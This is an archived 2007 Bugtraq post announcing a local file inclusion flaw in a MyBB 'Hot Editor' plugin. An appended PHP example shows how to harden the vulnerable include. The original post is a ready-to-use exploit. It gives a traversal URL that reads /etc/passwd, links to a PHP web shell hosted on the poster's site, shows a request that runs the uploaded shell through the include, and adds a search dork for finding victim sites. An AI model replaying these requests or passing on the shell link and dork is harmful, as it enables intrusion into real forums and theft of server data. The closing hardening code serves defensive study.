Message-ID: <20070409134018.32702.qmail@securityfocus.com>
Date: 9 Apr 2007 13:40:18 -0000
From: liz0@...w0rm.com
To: bugtraq@...urityfocus.com
Subject: Mybb Hot Editor Plugin Local File Inclusion

<?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0@...w0rm.com
---------------------------------------
Vul. Code :
keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/

http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd

And upload php shell = > http://www.expw0rm.com/avatar_36.zip

http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif

=> target isn't shown with IE. Please use Firefox.

Dork: "MTR Paket :"
?>

// Exploit Worm www.expw0rm.com
original: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html
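
Added example, not part of the original post and not the plugin author's code: one way to harden the include quoted in the advisory is to accept only a plain file name and confirm that the resolved path stays inside vk_code/. The `resolve_layout` helper, the `.php` layout naming and reading the value from `$_GET['first']` are assumptions made for illustration.

```php
<?php
// Added example (not the plugin's code). Assumes layouts are *.php files
// stored directly in ./vk_code/, as the require_once path in the post implies.

/**
 * Resolve a user-supplied layout name to a file inside $baseDir.
 * Returns the absolute path, or null if the name is not acceptable.
 * (Hypothetical helper, not an existing MyBB or plugin function.)
 */
function resolve_layout(string $baseDir, $name): ?string
{
    // Reject arrays (?first[]=x), empty values, NUL bytes, slashes and dots
    // other than the single one before the extension.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ and follows symlinks; false means no such file.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check: the resolved file must sit directly in the base
    // directory, which also rejects symlinks pointing elsewhere.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Vulnerable form quoted in the advisory:
//   require_once "./vk_code/$first";
// Hardened form (assumes the value arrives as the "first" query parameter):
$layout = resolve_layout(__DIR__ . '/vk_code', $_GET['first'] ?? null);
if ($layout === null) {
    http_response_code(400);
    exit('Unknown keyboard layout');
}
require_once $layout;
```

Both request values shown in the post fail the file-name pattern before any filesystem access, and the extension check means an uploaded image cannot be pulled in as code even if it lands in a reachable directory.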